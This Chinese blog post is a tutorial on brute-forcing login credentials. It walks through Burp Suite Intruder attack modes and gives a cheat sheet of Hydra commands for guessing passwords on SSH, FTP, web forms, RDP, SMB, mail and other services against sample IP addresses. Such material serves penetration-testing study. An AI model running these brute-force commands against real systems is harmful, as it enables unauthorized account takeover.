• burpSuite与九头蛇暴力破解



    登录界面

    BrupSuite自带暴力破解

    使用 BrupSuite 进行抓包:
    发现账户和密码是使用GET方式提交的,然后我们右键将抓到的包发送到 测试器Intruder 模块进行暴力破解:

    • [ ] 狙击手模式(Sniper)——它使用一组Payload集合,依次替换Payload位置上(一次攻击只能使用一个Payload位置)被§标志的文本(而没有被§标志的文本将不受影响),对服务器端进行请求,通常用于测试请求参数是否存在漏洞

    • [ ] 攻城锤模式(Battering ram)——它使用单一的Payload集合,依次替换Payload位置上被§标志的文本(而没有被§标志的文本将不受影响),对服务器端进行请求,与狙击手模式的区别在于,如果有多个参数且都为Payload位置标志时,使用的Payload值是相同的,而狙击手模式只能使用一个Payload位置标志。

    • [ ] 草叉模式(Pitchfork )——它可以使用多组Payload集合,在每一个不同的Payload标志位置上(最多20个),遍历所有的Payload。举例来说,如果有两个Payload标志位置,第一个Payload值为A和B,第二个Payload值为C和D,则发起攻击时,将共发起两次攻击,第一次使用的Payload分别为A和C,第二次使用的Payload分别为B和D。

    • [x] 集束炸弹模式(Cluster bomb)——它可以使用多组Payload集合,在每一个不同的Payload标志位置上(最多20个),依次遍历所有的Payload。它与草叉模式的主要区别在于,执行的Payload数据Payload组的乘积。举例来说,如果有两个Payload标志位置,第一个Payload值为A和B,第二个Payload值为C和D,则发起攻击时,将共发起四次攻击,第一次使用的Payload分别为A和C,第二次使用的Payload分别为A和D,第三次使用的Payload分别为B和C,第四次使用的Payload分别为B和D。

    • 使用集束炸弹模式(第四种)进行测试

    • 点击 clear 将所有参数置为未选中,然后将 username 和 password 选中,设置完毕后点击 payloads 开始设置攻击载荷:

    • 开始攻击,通过查看返回包的Length可判断是否爆破成功

    kali中的在线破解软件hydra

    1、破解ssh:

      hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh 
      hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh 
    

    2、破解ftp:

      hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV 
      hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV 
    

    3、get方式提交,破解web登录:

      hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/ 
      hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php
    

    4、post方式提交,破解web登录:

      hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password" 
      hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or             password</title>" 
      (参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,<title>中 的内容是表示错误猜解的返回信息提示。) 
    

    5、破解https:

      hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https 
    

    6、破解teamspeak:

    hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak 
    

    7、破解cisco:

      hydra -P pass.txt 10.36.16.18 cisco 
      hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable 
    

    8、破解smb:

      hydra -l administrator -P pass.txt 10.36.16.18 smb 
    

    9、破解pop3:

      hydra -l muts -P pass.txt my.pop3.mail pop3 
    

    10、破解rdp:

      hydra ip rdp -l administrator -P pass.txt -V 
    

    11、破解http-proxy:

      hydra -l admin -P pass.txt http-proxy://10.36.16.18 
    

    12、破解imap:

      hydra -L user.txt -p secret 10.36.16.18 imap PLAIN 
      hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
  • 相关阅读:
    数据库sql一些常考基础命令
    C# and .NET之父——传奇的anders hejlsberg
    数据库中3大范式的详解
    小胖求职记—求职中的技巧
    程序员们喜爱看的文章
    为什么世界上没有天才(转)
    C语言中system函数的使用
    关于DataGrid的知识和技巧
    分页
    在调用方法时产生异常的处理方法
  • 原文地址:https://www.cnblogs.com/jiangyatao/p/13225261.html
Copyright © 2020-2023  润新知